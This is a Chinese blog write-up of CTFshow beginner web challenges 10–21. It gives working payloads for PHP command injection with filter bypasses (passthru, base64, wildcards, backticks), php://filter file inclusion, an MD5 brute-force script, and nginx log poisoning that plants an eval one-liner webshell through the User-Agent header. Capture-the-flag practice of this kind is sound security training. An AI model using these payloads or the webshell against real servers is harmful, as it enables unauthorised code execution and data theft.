ctfshow 萌新web10-21

最新推荐文章于 2024-08-27 15:28:46 发布
最新推荐文章于 2024-08-27 15:28:46 发布
阅读量870 收藏 8
点赞数 1
文章标签: php linux 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57276420/article/details/128119816
版权
这篇博客详细介绍了CTFShow一系列Web挑战的解决过程,涉及命令注入和文件包含漏洞的利用。通过使用不同PHP函数如passthru()绕过过滤,结合base64编码、通配符等技巧获取flag。同时,还展示了如何通过日志文件包含来获取敏感信息。解题方法包括爆破、伪协议构造Payload等技术,揭示了Web安全中的常见攻击手段。
摘要由CSDN通过智能技术生成

ctfshow 萌新web10-21

web10

在这里插入图片描述

题目提示flag在congfig.php中

php中作为执行系统命令的函数:

system()
passthru()
exec()
shell_exec()
popen()
proc_open()
pcntl_exec()

源码中过滤了 system,exec,highlight 这三个常用的PHP命令执行函数,绕过过滤条件就可以使用 eval() 函数执行PHP代码了,我们使用其他的命令执行函数即可,这里使用 passthru()函数即可

payload: ?c=passthru('cat config.php');

显示页面为空格,查看网页源代码得flag

web11

在这里插入图片描述

与web10相比,此处多过滤了cat,用more代替cat即可

payload: ?c=passthru('more config.php');

显示页面为空格,查看网页源代码得flag

web12

在这里插入图片描述

由提示flag在config.php中,但是config.php被过滤,抓取文件内容的cat也被过滤

利用其它方法绕过过滤,命令执行函数passthru未被过滤可利用

cat可用tac或more(需要多一步查看网页源代码)替代

解法一:

config.php可先base64编码再解码方式绕过

payload: ?c=$a=base64_decode('Y29uZmlnLnBocA==');passthru("tac $a");

注意:这里函数内部要用双引号,如果是单引号,php语言无法处理达到你的目的

因为在php语言中单引号串和双引号串的处理是不同的。双引号串中的内容可以被解释而且替换,而单引号串中的内容总被认为是普通字符。也就是说,如果这里用了单引号的话,php会认为他就是一个普通的变量c,无法解释出系统命令cat的功能。

解法二:

通配符绕过

payload:

?c=passthru('tac ??????????');
?c=passthru('tac c*');
?c=passthru('tac *');

web13

在这里插入图片描述

新增;被过滤 可用?>代替绕过

解法一:

payload: ?c=passthru('tac *')?>

解法二:

passthru("ca''t `ls`")?>

Linux中,`` 作用是优先执行里面的内容,再把里面的内容传给外面的语句

web14

在这里插入图片描述

用include函数和伪协议构成Payload

include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=config.php

(用?>代替;只能执行一次代码)

得到一段base64编码

在这里插入图片描述

解码得到flag

web15

在这里插入图片描述

与web14相比?>被过滤,但是;被放出来了,将web14中payload?>改为;即可

include$_GET[a];&a=php://filter/read=convert.base64-encode/resource=config.php

web16

在这里插入图片描述

由涉及md5比较

利用脚本爆破

import hashlib
#建立爆破的字典str
str='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890+-*/'
#从一个字符开始尝试,逐渐往下加
for i in str:
    for j in str :
        for k in str:
            s=hashlib.md5(('ctfshow'+i+j+k).encode()).hexdigest()
            #让ctfshow和字符i,j,k拼接在一起,转化为MD5值,hexdigest函数实现字符存储
            if s== 'a6f57ae38a22448c2f07f3f95f49c84e':#判断值是否符合条件
                print(i+j+k)#输出字符c的值

得到c的参数值:36d

payload:

?c=36d

web17

在这里插入图片描述

c传参过滤掉php
思路:include文件包含,利用日志文件包含

访问日志文件:
?c=/var/log/nginx/access.log

在这里插入图片描述

发现日志文件记录了user-agent头,于是在该头中插入一句话木马:

<?php eval($_POST['a']);?>

在这里插入图片描述

蚂剑链接发现flag

在这里插入图片描述

在这里插入图片描述

web18

同web17日志包含解出

web19

同web17日志包含解出

web20

同web17日志包含解出

web21

同web17日志包含解出

ikn0w1T
关注
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web题目,该题目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
CTFshow(web入门)(17~)
chenjyboke的博客
02-19 3336
web17 问题: 备份的sql文件会泄露敏感信息 解决:直接查询 backup.sql打开文件得到flag web18 问题: 不要着急,休息,休息一会儿,玩101分给你flag 解决: 查看源码发现js文件。发现unicode编码解码中文发现访问查看110.php找到flag web19 问题 密钥什么的,就不要放在前端了 解决:查看源码发现账号密码,由于加密使用post传参等得到flag web20 问题: mdb文件是早期asp+acces..
ctfshow萌新web17
qq_45829213的博客
02-20 2359
<?php if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/php/i",$c)){ include($c); } }else{ highlight_file(__FILE__); } ?> c传参过滤掉php 思路:include文件包含,利用日志文件包含 访问日志文件: ?c=/var/log/nginx/access.log 发现日志文件记
CTFSHOW 萌新 web17 解题思路和方法(利用文件包含漏洞)
最新发布
weixin_58052886的博客
08-27 356
点击题目,发现代码中使用了文件包含,那么我们可以尝试使用文件包含的方向解决该题,使用wapparryzer插件分析看到其服务器类型为nginx。发现其日志文件中写入了user-agent了信息,那么我们在提交请求的时候可以在user--agent中写入木马。使用bp抓包软件抓取请求,然后修改user-agent的值,写入一句话木马,然后提交请求。Web18、web19、web20、web21 解题思路和方法与web17一模一样。右键单击,进入目录,发现www下有两个文件,我们点击36d.php查看其内容。
CTFshow中的web17
zhong_yan的博客
10-26 3366
打开题目,我们看到这样的提示 对于这里的探针我们可以使用tz.php尝试访问 可以看到,访问成功了。 然后这里的flag要一个一个找(emm,做个弊,直接在php信息里面找里面找(滑稽))。 然后找到里面的环境变量(environment) 可以看到里面是有flag的。(虽然也有一些刻意,但也不妨碍成为一种思路。) ...
CTFshow_萌新解题
ymx520haha的博客
04-24 1497
得到字母,但不是flag,看到作者名字是培根,想到了培根密码,将A替换m,B替换d,AABBABABAAABBBABABBAAAAAAABBABAABBA得到,进行解密得到guowang,改为大写提交flag成功。下载完发现是一个音频文件,用au打开,发现一段长短波,考虑为摩斯(-- ..- --.. .. -.- .. ... --. ----- ----- -..)看代码,发现存在命令执行漏洞,尝试构造得到flag,使用system(“cat config,php”),f12看源码得到flag。
CTFSHOW萌新计划 web16-17
羽的博客
04-03 3078
题目地址 https://ctf.show 0x01 web16 这个直接爆破就可以了,但是如果你是官网群里的成员,就会知道有个36d的梗 payload=36d 爆破的话给个脚本 import hashlib str1='abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ' payload='' for i in str1...
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
ctfshow-web41~60-WP
02-21
### CTFShow Web挑战41~60:深入解析与实战技巧 #### 挑战概述 CTFShow是一个提供多样化的网络安全挑战题目的平台,其中包含了大量的Web安全题目供参与者学习与实践。本篇文章主要关注的是CTFShow中的Web挑战第41...
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
CTFshow web17
zoixsoadji的博客
03-12 8247
萌新计划 进入题目,是一行php代码,发现c传参过滤掉了php,尝试一下日志文件包含漏洞 nginx的日志文件位置是/var/log/nginx/access.log 发现日志文件记录了User-Agent 那么我们就在User-Agent中写入一句话木马 上传成功,接下来我们就用蚁剑来连接这个一句话木马 连接成功, 在36d.php下面就能看到flag ...
ctfshow_web1-17_信息搜集
记录学习成长之路上的点点滴滴
03-23 479
2023/03/23 ctfshow刷题 web-入门 信息搜集 1-20
ctfshow web入门 信息收集
Anton1a的博客
02-24 4371
web1 按F12查看源码,得到flag web2 打开题目,首先先查看源码但是按F12后无法查看源码,肯定是javascript限制了,在浏览器中禁用javascript,之后F12查看源码拿到flag。或者直接在url前面加上view-source:也可以直接看到flag web3 题目描述说是抓个包看看,就不抓包了直接用浏览器查看network看见flag web4 题目描述说总有人把后台地址写入robots,其实就是访问robots.txt,之后看到一个/flagi..
CTFSHOW系列-web17(信息收集-sql文件泄露)
siu~
12-01 561
CTFSHOW系列解题思路
CTF秀WEB入门的SQL注入web171
沐一 · 林 的博客
09-06 1006
CTF秀WEB入门的SQL注入web171 继续开启全栈梦想之逆向之旅~ 这题是 CTF秀WEB入门的SQL注入web171
CTFSHOW web入门——web171
m0_74093152的博客
03-26 438
查询用户名为flag的信息 1' union select id,username,password from ctfshow_user where username='flag' --+然后查询库名 1' union select 1,2,database() --+首先查询有多少列,1' order by 3--+查看ctfshow_web库的表。
ctfshow萌新计划类web全解 wp
arcuied
11-25 1530
ctfshow萌新计划类web全解 wp
ctfshow-萌新
qq_43618536的博客
07-14 4581
ctfshow-萌新
ctfshow萌新web
09-02
ctfshow萌新web是一个CTF比赛中的题目,具体是关于web安全的。根据引用[1]和引用所提到的内容,这道题目涉及到了使用intval函数获取敏感数据的特性。在解题过程中,我们需要通过绕过某些过滤条件,使得传入的参数id...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值